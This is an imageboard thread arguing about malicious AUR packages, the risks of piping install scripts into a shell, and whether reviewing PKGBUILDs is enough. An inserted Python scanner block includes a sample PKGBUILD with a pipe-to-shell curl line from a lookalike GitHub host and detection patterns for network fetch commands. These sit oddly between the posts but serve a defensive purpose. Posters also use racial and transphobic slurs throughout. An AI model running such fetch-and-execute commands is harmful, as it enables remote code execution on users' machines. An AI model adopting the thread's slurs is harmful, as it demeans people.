maybe try to be less jeety. and by that, i mean actually learning things, not PRETENDING to know things.
>>
>>109046698
steam OS is immutable and main partition is read only by default
you can't even use regular pacman without disabling the read only lock, and it has no AUR stuff by default, it is mostly only steam pre approved packages that they deliver via the steam update that get in (and everything you install via pacman will get overwritten since the entire OS refreshes on an update)
>>
>>109055441
>read what,retard? the hex of elf binaries or other binary assets? lol
we're talking about the install script since my first post holy fuck.
>or did you think scripts can only grab other scripts, ad infinitum?
read all the scripts
>you don't even know what a threat model is.
I do
> and the way you formulate things ("the script you can read on their website") further proves your general tech illiteracy.
I'm answering the fucking question of piping a script, not sure why you're trying to derail the discussion
>maybe try to be less jeety. and by that, i mean actually learning things, not PRETENDING to know things.
I do know thing, you're just sperging about worthless shit since the beginning while we agree on everything...
>>
>>109055494
>we're talking about the install script since my first post holy fuck.
what do you think most install scripts install, dumb retard
>akshually i know everything and i'm winning izzat here
sure thing
>>
>>109055689
>what do you think most install scripts install, dumb retard
so? it's another discussion
>why piping url into sh is bad
>because you should read the script and see what it does
>end of discussion
why did my post make you angry?
>>
>>109055480
thanks, so the gamers are safe
>>
File: 14103422959.png (2.22 MB, 1742x1080)
2.22 MB PNG
>>109040408
Arch, not even once.
>>
>>109055716
>i totally won izzat
we know you believe that. you don't have to keep posting.
>>
lmao securitrannies get fucked
>>
>>109054524
Nope
>>
>>109055921
cope seethe dilate
>>
>>109054598
thanks for bringing me back, i'll enjoy my stay.
>>
>>109056847
>I hate it here
>I'm staying
Ok?
>>
I believe that from the very beginning it was instructed to always review the PKGBUILDs. You can even ask your favorite AI agent to do it now.
>>
These threads are filled with so many obvious microjeets
>>
>>109057961
/g/ is the brownest board on 4chan
>>
File: 1781023162074602.png (302 KB, 646x700)
302 KB PNG
accounts-qml-module 0.7-8
corefreq-client 2.1.0-1
corefreq-dkms 2.1.0-1
corefreq-server 2.1.0-1
crudini 0.9.6-2
gtkd 3.11.0-4
kwin-scripts-krohnkite 0.9.9.2-4
libsoup 2.74.3-4
mprime 2:30.19.20-1
obs-backgroundremoval 1.3.7-1
obs-pipewire-audio-capture 1.2.1-1
python-iniparse-git 0.5.1.r10.ge7c08ea-1
safe-rm 1.1.0-3
samsung-ssd-dc-toolkit 2.1-4
systester-cli-bin 1.5.1-1
teamspeak 6.0.0beta4-2
tilix 1.9.6-9
zenmonitor3 2.0.0-2

Brave AI made me shit myself telling me accounts-qml-module was compromised whereas its source is just some pledditfags finding it suspicious that it was moved from official to aur repo on may 29, nigger gave me a panic attack.
>>
>>109058028
The whole internet is browner by the day and insufferable. So is IT field in general.
I'm switching fields as I type this.
>>
>>109058046
what is that even used for anyway
>>
>>109040408
Troonix is such a joke. I can't believe I got into the Omarchy craze and installed that shit on my laptop. I'm not even saying that Windows is good in comparison, just that Linux is just as much sloppa as the rest.
>>
File: 1780879145022179.gif (1.56 MB, 480x270)
1.56 MB GIF
>>109058046
>Brave AI
>>
>>109055494
>read all the scripts
this is your answer? nah find a way to not have to read scripts. write a checker that does what you would do... these are computers ffs, next thing you're gonna tell me to use an abacus to verify the computer's arithmetic
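Taking the "write a checker that does what you would do" suggestion above together with the earlier advice to download the script and check its URLs for non-ASCII characters: the following is an added example, not code from anyone in this thread, of a small Python checker for a shell script or PKGBUILD. It flags ad-hoc network fetches (curl/wget/npm install and friends, which bypass makepkg's source checksums), checksums set to SKIP, and hostnames with non-ASCII or uppercase lookalike characters; the PKGBUILD it scans is constructed for the demo, and the command list is an assumption you would extend for your own review.

```python
import re
import unicodedata
from urllib.parse import urlsplit

# Commands that pull code from the network at build/install time. Anything fetched this
# way bypasses the source=() / *sums=() integrity check makepkg performs, so seeing one
# inside build()/package() of a freshly adopted PKGBUILD is what a reviewer looks for.
NETWORK_FETCH = re.compile(r"\b(curl|wget|npm\s+install|pip\s+install|git\s+clone)\b")
URL_RE = re.compile(r"https?://[^\s'\")]+")
# makepkg treats a checksum of 'SKIP' as "do not verify this source at all".
SKIP_SUM = re.compile(r"\b(sha\d+|md5|b2)sums=\([^)]*'SKIP'")

def check_url(url):
    """Return reasons this URL's host deserves a second look ([] if none)."""
    reasons = []
    # Use netloc rather than .hostname: .hostname lowercases, which would hide the I/l trick.
    host = urlsplit(url).netloc.split("@")[-1].split(":")[0]
    for ch in host:
        if ord(ch) > 127:  # IDN homoglyph, e.g. Cyrillic i in place of Latin i
            reasons.append(f"non-ASCII U+{ord(ch):04X} ({unicodedata.name(ch, '?')}) in host")
            break
    if any(ch.isupper() for ch in host):
        # Hostnames are case-insensitive; a capital I standing in for l is the classic trick.
        reasons.append("uppercase letter in host (possible I/l lookalike)")
    return reasons

def scan_script(text):
    """Scan a shell script or PKGBUILD; return a list of (line_no, kind, detail) findings."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        code = raw.split("#", 1)[0]  # drop trailing comments
        for url in URL_RE.findall(code):
            for reason in check_url(url):
                findings.append((no, "suspicious-url", f"{url}: {reason}"))
        if NETWORK_FETCH.search(code):
            findings.append((no, "network-fetch", code.strip()))
        if SKIP_SUM.search(code):
            findings.append((no, "unverified-source", "checksum is SKIP"))
    return findings

# Constructed PKGBUILD fragment for the demo (not a real AUR package): a short
# package() that shells out to npm/curl/wget, the pattern the thread is arguing about.
SAMPLE_PKGBUILD = """\
pkgname=foo-bin
pkgver=1.0
source=("https://github.com/example/foo/releases/download/v1.0/foo.tar.gz")
sha256sums=('SKIP')
package() {
    install -Dm755 foo "$pkgdir/usr/bin/foo"
    npm install -g https://helper-cdn.invalid/helper.tgz
    curl -s https://g\u0456thub.com/x/setup.sh | sh
    wget https://examp\u0049e.invalid/post.sh
}
"""

if __name__ == "__main__":
    for no, kind, detail in scan_script(SAMPLE_PKGBUILD):
        print(f"line {no}: {kind}: {detail}")
```

It is a triage aid, not a verdict: a clean report only means none of these particular patterns appeared, so the script still has to be read.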
>>
fuck yeah OP love that the internet is now zero trust, everyone is a 3rd world pajeetoid scammer in disguise or will be hacked for 2 cents worth of electricity
what fucking retards arch faggots were to ever trust anyone, how insane is that?
>>
>>109058058
Don't remember I'll check tomorrow which packages depend on it
>>
>>109058058
looks like a way to sideload ios apps without a jailbreak to me. Might be part of some dev tools
>>
>>109058206
whoops wrong thread
>>
>>109041859
Nigger?
Every time we bring up the inherent vulnerabilities in rolling distros, some archfaggot turns up his nose.
We've been warning about this increasingly over the past few months.
>>
>>109058228
>jeet wintard who just woke up thinks this is related to rollingness
>>
>>109057155
you're completely retarded.
>>
File: 1625118426260.jpg (75 KB, 419x280)
75 KB JPG
>>109040408
imagine using someone else's software
>>
>>109049497
flathub apps are 500mb each
>>
>>109052771
>You are told at every step in the Arch experience to be careful with AUR.
Where?
>>
>>109040518
ebussy always wins
>>
>>109058984
https://wiki.archlinux.org/title/Arch_User_Repository
>Warning: AUR packages are user-produced content. These PKGBUILDs are completely unofficial and have not been thoroughly vetted. Any use of the provided files is at your own risk.

https://aur.archlinux.org/
>DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk.
>>
>>109041329
>appimages are slow and missing integration

Gear Lever improves appimage integration
>>
thoughts about ks-aur-scanner ? I installed it and set a pacman hook to prevent any suspicious AUR package from being installed.
>>
>>109055855
Totally.

Slackware saw this in 2006 and sorted it out.

https://blog.slackware.nl/ten-years-of-slackbuilds-org/
>>
>>109055855
Can't you just as easily download malware from an ebuild repository that's not from the official or user-maintained one?
>>
File: esteban winsmore.png (37 KB, 250x250)
37 KB PNG
>>109041163
>install rocky linux instead
>first thing I see on their website is a trans/poc pride flag logo
>>
>>109062310
You can just as easily inject a syringe of cyanide into bison steaks as you can poison pills into Tylenol. But nobody has ever done the first one because more people take Tylenol than eat bison steaks.
>>
>>109040408
>Heh guise, it's fine, I definitely totally check every single pkgbuild I run as well as every single source file it downloads and I decompile every single binary downloaded, decompile it and check for any malware behavior!

This is what Arch users actually claim. (They don't actually, which is why they're fucked. What they really do is install something like yay which just YOLOs AURshit).
>>
>>109062519
Literally, nobody has ever claimed that.
>>
>>109062525
They claim that kind of shit every time. Even in this thread you see Arch-retards who claim that all you need to do is read the PKGBUILD.
>>
>>109062535
They don't, but okay.
>>
>>109062539
>CTRL+F (in this thread)
>Type "PKGBUILD"
>It takes you to various posts of Arch-tards claiming that "you just need to read the PKGBUILD, bro!"
>>
>>109062535
I'm glad we agree that they don't say that they've checked the package builds and they only say that that's what you should be doing. No idea why you lied in your first post and then clearly admitted that you were in your second post.
>>
>>109062554
See
>>109062560
The discussion is over. Next time, don't make ridiculously false claims that you end up having to move the goal post of
>>
>>109062560
If someone acts smug and claims that "you just need to check the PKGBUILD, bro", this implies they do it themselves.
Why would someone claim "Reading a PKGBUILD isn't strenuous" if they don't do it?

Merely reading the PKGBUILD doesn't do shit if the malware is in the source code or binaries it downloads anyway so "just reading the PKGBUILD" isn't enough, anyway. If you want to be safe, you can't use the AUR at all.
>>
>>109062578
Yeah, like I said, the discussion is over. You can keep replying, but every reply you make to backtrack from your original claim just makes you look worse. In either case, I'm going to hide your posts and replies now, since you're obviously just going to keep responding with bad faith nonsense arguments. And I don't have time to waste on you.
>>
File: DOTHIS-0.png (517 KB, 981x700)
517 KB PNG
All of this fagging on about "checking muh PKGBUILD" but it's not like most users are going to be able to pick up on suspicious code. Nobody putting in backdoors is going
># this section sends the users bank account information directly to my phone
># if you want malware free software delete everything below this

I have a fair grasp of python and bash and even I don't think I'd be able to detect malicious shit every single time. With some attention to detail and a bit of luck sure, but then who the fuck puts that much effort into every .exe they download?

Why can't it just be accepted that if you're downloading untrusted software (read: 95%+ of all software ever made) that you should be maintaining other positive security practices. If you're at the point where you're using Arch+derivatives you should be able to segment your network, harden your install against basic linux flaws, and have backups ready for when shit goes south. Such straightforward issues being blown out of proportion... baka.
>>
>>109062584
What claim have I backtracked from?
I still believe most Arch users don't check their PKGBUILD. I still believe checking the PKGBUILD is not enough even if you do because the source code or the binary it downloads might be the malware. I still believe that Arch users who claim they verify these things for every single AUR package they use are lying.
And obviously nobody actually decompiles binaries, that part was an exaggeration to show you how absurd those Arch users' claims were.

But sure. Have a nice day.
>>
>>109062578
just scrolling the main page
they were orphan packages; it has nothing to do with the source of the original package
they modified the pkgbuild (about 20-50 lines, very short file) to use npm to install malware in the npm package manager.
npm and pip are the real malware distribution platforms.
>>
>>109062702
Pretty crude attack, then. If the attacker had been smart, they could have gotten more people.
Doesn't speak for the average Arch user that an attack like this has been this successful.

>B-But I typed commands from the installation tutorial on the wiki! I'm a computer wizard!
>>
File: 524198321.gif (2.03 MB, 498x640)
2.03 MB GIF
oh no, how will Arch users post pictures of their desktop now?
>>
>>109062742
it only ever happened in the first place because any rando can just claim any orphaned package without any restrictions or questions asked
really surprising that it took this long to happen
>>
B-B-BUT MY HECKIN MARKETSHARE ? :(((
>>
>>109062770
Screenfetch. Or was it Neofetch nowadays? Or pfetch? I really don't know what the current screenfetch clone of the week is called. Only Arch users have enough free time to keep up with this kind of shit.
>>
File: 1765805374768199.jpg (146 KB, 679x765)
146 KB JPG
>>109040408
Feels good being a Qubeschad.
>>
File: 1753518641412222.gif (25 KB, 450x556)
25 KB GIF
>>109061401
What's the salary over there in south asia? Up to $20 USD a day yet?
>>
>>109054114
1. Verifying the origin doesn't make any difference if the origin is serving malware
2. As other anon said, TLS and certificates accomplish the same thing.
3. You have to trust that you are using authentic keys.
4. You have to trust that the software you're using to perform key validation is doing it correctly/not compromised.
>>
>>109040408
>AUR
i so don't give a shit.


